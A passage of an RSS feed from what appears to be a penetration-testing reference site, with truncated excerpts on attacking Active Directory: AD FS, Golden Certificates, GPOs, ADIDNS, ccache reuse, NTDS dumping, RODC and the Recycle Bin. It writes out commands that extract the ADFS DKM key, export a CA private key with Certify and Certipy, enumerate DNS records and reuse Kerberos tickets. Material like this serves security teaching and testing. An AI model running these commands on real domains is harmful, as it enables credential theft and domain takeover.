&lt;li&gt;&lt;a href="https://github.com/SpecterOps/ConfigManBearPig"&gt;SpecterOps/ConfigManBearPig&lt;/a&gt; - for SCCM attack path (BloodHound OpenGraph PowerShell collector)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Examples&lt;/strong&gt;:&lt;/p&gt;</description></item><item><title>Active Directory - Federation Services</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adfs-federation-services/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adfs-federation-services/</guid><description>&lt;p&gt;Active Directory Federation Services (AD FS) is a software component developed by Microsoft that provides users with single sign-on (SSO) access to systems and applications located across organizational boundaries. It uses a claims-based access control authorization model to maintain application security and to provide seamless access to web-based applications that are hosted inside or outside the corporate network.&lt;/p&gt;
&lt;h2 id="adfs---dkm-master-key" class="anchored-heading"&gt;ADFS - DKM Master Key&lt;a class="heading-anchor" href="#adfs---dkm-master-key" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The DKM key is stored in the &lt;code&gt;thumbnailPhoto&lt;/code&gt; attribute of the AD contact object.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$key&lt;/span&gt;&lt;span class="p"&gt;=(&lt;/span&gt;&lt;span class="nb"&gt;Get-ADObject&lt;/span&gt; &lt;span class="n"&gt;-filter&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;ObjectClass -eq &amp;#34;Contact&amp;#34; -and name -ne &amp;#34;CryptoPolicy&amp;#34;&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-SearchBase&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;CN=ADFS,CN=Microsoft,CN=Program Data,DC=domain,DC=local&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-Properties&lt;/span&gt; &lt;span class="n"&gt;thumbnailPhoto&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="py"&gt;thumbnailPhoto&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="no"&gt;System.BitConverter&lt;/span&gt;&lt;span class="p"&gt;]::&lt;/span&gt;&lt;span class="n"&gt;ToString&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="adfs---trust-relationship" class="anchored-heading"&gt;ADFS - Trust Relationship&lt;a class="heading-anchor" href="#adfs---trust-relationship" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Gets the relying party trusts of the Federation Service.&lt;/p&gt;</description></item><item><title>Active Directory - Golden Certificate</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-golden-certificate/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-golden-certificate/</guid><description>&lt;p&gt;A Golden Certificate is a maliciously crafted certificate that an attacker generates using the CA’s private key.&lt;/p&gt;
&lt;h2 id="obtain-ca-certificate" class="anchored-heading"&gt;Obtain CA certificate&lt;a class="heading-anchor" href="#obtain-ca-certificate" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Export the CA certificate including the private key:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/GhostPack/Certify"&gt;GhostPack/Certify&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Certify&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="nb"&gt;manage-self&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-dump-certs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/ly4k/Certipy"&gt;ly4k/Certipy&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;ca&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;administrator@corp.local&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Passw0rd!&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-ns&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;10.10.10.10&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-target&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;CA.CORP.LOCAL&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-config&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;CA.CORP.LOCAL\CORP-CA&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-backup&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://learn.microsoft.com/en-us/system-center/scom/obtain-certificate-windows-server-and-operations-manager"&gt;windows-gui/certsrv.msc&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Open &lt;code&gt;certsrv.msc&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Right click the CA -&amp;gt; &lt;code&gt;All Tasks&lt;/code&gt; -&amp;gt; &lt;code&gt;Back up CA...&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Follow the wizard but make sure to check &lt;code&gt;Private key and CA certificate&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/export-certificate-private-key"&gt;windows-gui/certlm.msc&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Open &lt;code&gt;certlm.msc&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Go to &lt;code&gt;Personal&lt;/code&gt; -&amp;gt; &lt;code&gt;Certificates&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Right click the CA signing certificate -&amp;gt; &lt;code&gt;All Tasks&lt;/code&gt; -&amp;gt; &lt;code&gt;Export&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Follow the wizard but make sure to choose &lt;code&gt;Yes, export the private key&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil"&gt;windows-commands/certutil&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Active Directory - Group Policy Objects</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-group-policy-objects/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-group-policy-objects/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;:triangular_flag_on_post: GPO Priorization : Organization Unit &amp;gt; Domain &amp;gt; Site &amp;gt; Local&lt;/p&gt;
&lt;p&gt;GPO are stored in the DC in &lt;code&gt;\\&amp;lt;domain.dns&amp;gt;\SYSVOL\&amp;lt;domain.dns&amp;gt;\Policies\&amp;lt;GPOName&amp;gt;\&lt;/code&gt;, inside two folders &lt;strong&gt;User&lt;/strong&gt; and &lt;strong&gt;Machine&lt;/strong&gt;.
If you have the right to edit the GPO you can connect to the DC and replace the files. Planned Tasks are located at &lt;code&gt;Machine\Preferences\ScheduledTasks&lt;/code&gt;.&lt;/p&gt;</description></item><item><title>Active Directory - Groups</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-groups/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-groups/</guid><description>&lt;h2 id="dangerous-built-in-groups-usage" class="anchored-heading"&gt;Dangerous Built-in Groups Usage&lt;a class="heading-anchor" href="#dangerous-built-in-groups-usage" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object &lt;code&gt;CN=AdminSDHolder,CN=System&lt;/code&gt; or set &lt;code&gt;adminCount&lt;/code&gt; attribute to &lt;code&gt;0&lt;/code&gt; for the required object.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The AdminCount attribute is set to &lt;code&gt;1&lt;/code&gt; automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s).&lt;/p&gt;</description></item><item><title>Active Directory - Integrated DNS - ADIDNS</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-integrated-dns/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-integrated-dns/</guid><description>&lt;p&gt;ADIDNS zone DACL (Discretionary Access Control List) enables regular users to create child objects by default, attackers can leverage that and hijack traffic. Active Directory will need some time (~180 seconds) to sync LDAP changes via its DNS dynamic updates protocol.&lt;/p&gt;
&lt;h2 id="ldap-based-require-authentication" class="anchored-heading"&gt;LDAP-Based (Require authentication)&lt;a class="heading-anchor" href="#ldap-based-require-authentication" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Enumerate all records&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;adidnsdump&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;DOMAIN&lt;/span&gt;&lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-print-zones&lt;/span&gt; &lt;span class="n"&gt;dc&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;corp&lt;/span&gt; &lt;span class="p"&gt;(-&lt;/span&gt;&lt;span class="n"&gt;-dns-tcp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# or&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;bloodyAD&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-host&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;example&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;lab&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;pass123&lt;/span&gt; &lt;span class="n"&gt;get&lt;/span&gt; &lt;span class="n"&gt;dnsDump&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Query a node&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;dnstool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;DOMAIN\user&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;password&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-record&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;*&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-action&lt;/span&gt; &lt;span class="n"&gt;query&lt;/span&gt; &lt;span class="nv"&gt;$DomainController&lt;/span&gt; &lt;span class="p"&gt;(-&lt;/span&gt;&lt;span class="n"&gt;-legacy&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# or&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;bloodyAD&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;john&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;doe&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Password123!&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-host&lt;/span&gt; &lt;span class="mf"&gt;192.168&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;100&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;1&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;bloody&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;lab&lt;/span&gt; &lt;span class="n"&gt;get&lt;/span&gt; &lt;span class="n"&gt;search&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-base&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;DC=DomainDnsZones,DC=bloody,DC=lab&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-filter&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;(&amp;amp;(name=allmightyDC)(objectClass=dnsNode))&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-attr&lt;/span&gt; &lt;span class="n"&gt;dnsRecord&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Add a node and attach a record&lt;/p&gt;</description></item><item><title>Active Directory - Linux</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-linux/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-linux/</guid><description>&lt;h2 id="ccache-ticket-reuse-from-tmp" class="anchored-heading"&gt;CCACHE ticket reuse from /tmp&lt;a class="heading-anchor" href="#ccache-ticket-reuse-from-tmp" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;List the current ticket used for authentication with &lt;code&gt;env | grep KRB5CCNAME&lt;/code&gt;. The format is portable and the ticket can be reused by setting the environment variable with &lt;code&gt;export KRB5CCNAME=/tmp/ticket.ccache&lt;/code&gt;. Kerberos ticket name format is &lt;code&gt;krb5cc_%{uid}&lt;/code&gt; where uid is the user UID.&lt;/p&gt;</description></item><item><title>Active Directory - Machine Account Quota</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-machineaccountquota/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-machineaccountquota/</guid><description>&lt;p&gt;In Active Directory (AD), the &lt;code&gt;MachineAccountQuota&lt;/code&gt; is a limit set on how many computer accounts a specific user or group can create in the domain.&lt;/p&gt;
&lt;p&gt;When a user attempts to create a new computer account, AD checks the current number of computer accounts that the user has already created against the defined quota for that user or group.&lt;/p&gt;
&lt;p&gt;However, Active Directory does not store the current count of created machine accounts directly in a user attribute. Instead, you would need to perform a query to count the machine accounts that were created by a specific user.&lt;/p&gt;</description></item><item><title>Active Directory - NTDS Dumping</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-ntds-dumping/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-ntds-dumping/</guid><description>&lt;p&gt;You will need the following files to extract the ntds :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;NTDS.dit file&lt;/li&gt;
&lt;li&gt;SYSTEM hive (&lt;code&gt;C:\Windows\System32\SYSTEM&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Usually you can find the ntds in two locations : &lt;code&gt;systemroot\NTDS\ntds.dit&lt;/code&gt; and &lt;code&gt;systemroot\System32\ntds.dit&lt;/code&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;systemroot\NTDS\ntds.dit&lt;/code&gt; stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;systemroot\System32\ntds.dit&lt;/code&gt; is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However you can change the location to a custom one, you will need to query the registry to get the current location.&lt;/p&gt;</description></item><item><title>Active Directory - Read Only Domain Controller</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-rodc/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-rodc/</guid><description>&lt;p&gt;RODCs are an alternative for Domain Controllers in less secure physical locations&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Contains a filtered copy of AD (LAPS and Bitlocker keys are excluded)&lt;/li&gt;
&lt;li&gt;Any user or group specified in the &lt;strong&gt;managedBy&lt;/strong&gt; attribute of an RODC has local admin access to the RODC server&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="rodc-golden-ticket" class="anchored-heading"&gt;RODC Golden Ticket&lt;a class="heading-anchor" href="#rodc-golden-ticket" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;You can forge an RODC golden ticket and present it to a writable Domain Controller only for principals listed in the RODC’s &lt;strong&gt;msDS-RevealOnDemandGroup&lt;/strong&gt; attribute and not in the RODC’s &lt;strong&gt;msDS-NeverRevealGroup&lt;/strong&gt; attribute&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="rodc-key-list-attack" class="anchored-heading"&gt;RODC Key List Attack&lt;a class="heading-anchor" href="#rodc-key-list-attack" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;:&lt;/p&gt;</description></item><item><title>Active Directory - Recycle Bin</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-recycle-bin/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-recycle-bin/</guid><description>&lt;h2 id="details" class="anchored-heading"&gt;Details&lt;a class="heading-anchor" href="#details" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Deleted objects have a default retention time of 180 days&lt;/li&gt;
&lt;li&gt;Recycle Bin path: &lt;code&gt;CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=example,DC=com&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Enable Active Directory Recycle Bin in PowerShell&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Enable-ADOptionalFeature&lt;/span&gt; &lt;span class="n"&gt;-Identity&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=contoso,DC=com&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-Scope&lt;/span&gt; &lt;span class="n"&gt;ForestOrConfigurationSet&lt;/span&gt; &lt;span class="n"&gt;-Target&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;contoso.com&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="deleted-objects" class="anchored-heading"&gt;Deleted Objects&lt;a class="heading-anchor" href="#deleted-objects" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;LIST_CHILD&lt;/code&gt; right on the Deleted Objects container&lt;/li&gt;
&lt;li&gt;OID &lt;code&gt;1.2.840.113556.1.4.2064&lt;/code&gt;: shows deleted, tombstoned, and recycled&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Exploitation&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;List rights&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;bloodyAD&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;domain&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Password123!&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-host&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;get&lt;/span&gt; &lt;span class="n"&gt;search&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="mf"&gt;1.2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;840&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;113556&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;2064&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-resolve-sd&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-attr&lt;/span&gt; &lt;span class="n"&gt;ntsecuritydescriptor&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-base&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;CN=Deleted Objects,DC=domain,DC=local&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-filter&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;(objectClass=container)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Check all rights from the requirements&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;bloodyAD&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-host&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;domain&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Password123!&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;get&lt;/span&gt; &lt;span class="n"&gt;writable&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-include-del&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;List deleted objects with bloodyAD&lt;/p&gt;</description></item><item><title>Active Directory - Tricks</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-tricks/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-tricks/</guid><description>&lt;h2 id="kerberos-clock-synchronization" class="anchored-heading"&gt;Kerberos Clock Synchronization&lt;a class="heading-anchor" href="#kerberos-clock-synchronization" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;In Kerberos, time is used to ensure that tickets are valid. To achieve this, the clocks of all Kerberos clients and servers in a realm must be synchronized to within a certain tolerance. The default clock skew tolerance in Kerberos is &lt;code&gt;5 minutes&lt;/code&gt;, which means that the difference in time between the clocks of any two Kerberos entities should be no more than 5 minutes.&lt;/p&gt;</description></item><item><title>aka.ms Shortcuts</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/aka-ms/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/aka-ms/</guid><description>&lt;p&gt;aka.ms is a URL shortening service used by Microsoft. It is commonly employed to create short, easily shareable links that redirect users to longer or more complex URLs, typically related to Microsoft services, products, or resources.&lt;/p&gt;
&lt;h2 id="azure-active-directory---admins" class="anchored-heading"&gt;Azure Active Directory - Admins&lt;a class="heading-anchor" href="#azure-active-directory---admins" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;aka.ms&lt;/th&gt;
 &lt;th&gt;Command&lt;/th&gt;
 &lt;th&gt;Portal Blade&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/ca"&gt;aka.ms/ad/ca&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;ca&lt;/td&gt;
 &lt;td&gt;Conditional Access&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/cawhatif"&gt;aka.ms/ad/cawhatif&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;cawhatif&lt;/td&gt;
 &lt;td&gt;Conditional Access What If&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
